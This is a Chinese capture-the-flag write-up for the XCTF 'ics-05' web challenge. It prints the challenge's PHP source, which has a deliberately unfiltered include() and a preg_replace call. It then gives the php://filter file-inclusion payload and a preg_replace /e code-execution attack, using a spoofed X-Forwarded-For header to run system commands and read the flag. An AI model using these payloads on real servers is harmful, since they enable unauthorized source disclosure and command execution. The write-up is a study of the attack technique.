XCTF ics-05

题目来源
攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth)
1.拿到题目以后,发现是一个index.php的页面,并且设备…没有显示完全,此位置可疑。
2.源代码中发现?page=index,出现page这个get参数,联想到可能存在文件包含读源码的漏洞,尝试读取index.php的页面源码

通过php内置协议直接读取代码
/index.php?page=php://filter/read=convert.base64-encode/resource=index.php

   
   
   
   
  • 1
  • 2

LFI漏洞的黑盒判断方法:
单纯的从URL判断的话,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞。
此处,因为源码中有提示?page=index,所以读一下index.php中的源码
3.在这里插入图片描述进行base64解密

@session_start();
posix_setuid(1000);

?>

<html>

<head>
<meta charset=utf-8>
<meta name=renderer content=webkit>
<meta http-equiv=X-UA-Compatible content=IE=edge,chrome=1>
<meta name=viewport content=width=device-width, initial-scale=1, maximum-scale=1>
<link rel=stylesheet href=layui/css/layui.css media=all>
<title>设备维护中心title>
<meta charset=utf-8>
head>

<body>
<ul class=layui-nav>
<li class=layui-nav-item layui-this><a href="?page=index">云平台设备维护中心a>li>
ul>
<fieldset class=layui-elem-field layui-field-title style=“margin-top: 30px;>
<legend>设备列表legend>
fieldset>
<table class=layui-hide id=test>table>
<script type=text/html id=switchTpl>
<! 这里的 checked 的状态只是演示 >
<input type=“checkbox” name=“sex” value="{{d.id}}" lay-skin=“switch” lay-text=“开|关” lay-filter=“checkDemo” {{ d.id==1 0003 ? ‘checked’ : ‘’ }}>
script>
<script src=layui/layui.js charset=utf-8>script>
<script>
layui.use(‘table’, function() {
var table = layui.table,
form = layui.form;

    table.render({
        elem: '#test',
        url: '/somrthing.json',
        cellMinWidth: 80,
        cols: [
            [
                { type: 'numbers' },
                 { type: 'checkbox' },
                 { field: 'id', title: 'ID', width: 100, unresize: true, sort: true },
                 { field: 'name', title: '设备名', templet: '#nameTpl' },
                 { field: 'area', title: '区域' },
                 { field: 'status', title: '维护状态', minWidth: 120, sort: true },
                 { field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true }
            ]
        ],
        page: true
    });
});
</script>
<script>
layui.use('element', function() {
    var element = layui.element; //导航的hover效果、二级菜单等功能,需要依赖element模块
    //监听导航点击
    element.on('nav(demo)', function(elem) {
        //console.log(elem)
        layer.msg(elem.text());
    });
});
</script>

$page = $_GET[page];

if (isset($page)) {

if (ctype_alnum($page)) {
?>

<br /><br /><br /><br />
<div style="text-align:center">
    <p class="lead"><?php echo $page; die();?></p>
<br /><br /><br /><br />

}else{

?>
<br /><br /><br /><br />
<div style=“text-align:center>
<p class=lead>

            if (strpos($page, 'input') > 0) {
                die();
            }

            if (strpos($page, 'ta:text') > 0) {
                die();
            }

            if (strpos($page, 'text') > 0) {
                die();
            }

            if ($page === 'index.php') {
                die('Ok');
            }
                include($page);
                die();
            ?>
    </p>
    <br /><br /><br /><br />

}}

//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER[‘HTTP_X_FORWARDED_FOR’] === ‘127.0.0.1’) {

echo "<br >Welcome My Admin ! <br >";

$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];

if (isset($pattern) && isset($replacement) && isset($subject)) {
    preg_replace($pattern, $replacement, $subject);
}else{
    die();
}

}
?>
body>
html>

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46
  • 47
  • 48
  • 49
  • 50
  • 51
  • 52
  • 53
  • 54
  • 55
  • 56
  • 57
  • 58
  • 59
  • 60
  • 61
  • 62
  • 63
  • 64
  • 65
  • 66
  • 67
  • 68
  • 69
  • 70
  • 71
  • 72
  • 73
  • 74
  • 75
  • 76
  • 77
  • 78
  • 79
  • 80
  • 81
  • 82
  • 83
  • 84
  • 85
  • 86
  • 87
  • 88
  • 89
  • 90
  • 91
  • 92
  • 93
  • 94
  • 95
  • 96
  • 97
  • 98
  • 99
  • 100
  • 101
  • 102
  • 103
  • 104
  • 105
  • 106
  • 107
  • 108
  • 109
  • 110
  • 111
  • 112
  • 113
  • 114
  • 115
  • 116
  • 117
  • 118
  • 119
  • 120
  • 121
  • 122
  • 123
  • 124
  • 125
  • 126
  • 127
  • 128
  • 129
  • 130
  • 131
  • 132
  • 133
  • 134
  • 135
  • 136
  • 137

得到源码后开始审计

//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<br >Welcome My Admin ! <br >";

$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];

if (isset($pattern) && isset($replacement) && isset($subject)) {
    preg_replace($pattern, $replacement, $subject);
}else{
    die();
}

}

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15

此处存在preg_replace函数,尝试测试是否存在命令注入漏洞
函数作用:搜索subject中匹配pattern的部分, 以replacement进行替换。
此处明显考察的是preg_replace 函数使用 /e 模式,导致代码执行的问题。也就是说,pat值和sub值相同,rep的代码就会执行。
XFF改成127.0.0.1之后,GET进来三个参数。这里调用了preg_replace函数。并且没有对pat进行过滤,所以可以传入"/e"触发漏洞,触发后replacement的语句是会得到执行的,首先执行一下phpinfo
在这里插入图片描述执行成功
然后使用system(“ls”)尝试获取文件目录
在这里插入图片描述使用cd进入目标文件
system(“cd+s3chahahaDir/flag+%26%26+ls”)
为了避免编码问题,此处不能使用空格隔开,而是使用+,%26%26为&&,意思是当前面命令执行成功时,继续执行后面的命令。
在这里插入图片描述最后使用cat命令获取flag.php中的文件
在这里插入图片描述成功获取flag。

总结:

思路建立:
1.由?page=index联想到可能存在文件包含读源码的漏洞,使用/index.php?page=php://filter/read=convert.base64-encode/resource=index.php获取index.php中源码
2.读取源码后,进行代码审计。发现存在preg_replace函数,尝试利用命令执行漏洞,获取到文件目录,最终找到目标文件
3.读取存在flag的文件,得到flag。
主要技能点:
文件包含漏洞
PHP伪协议中的 php://filter
preg_replace函数引发的命令执行漏洞

你可能感兴趣的:(代码审计)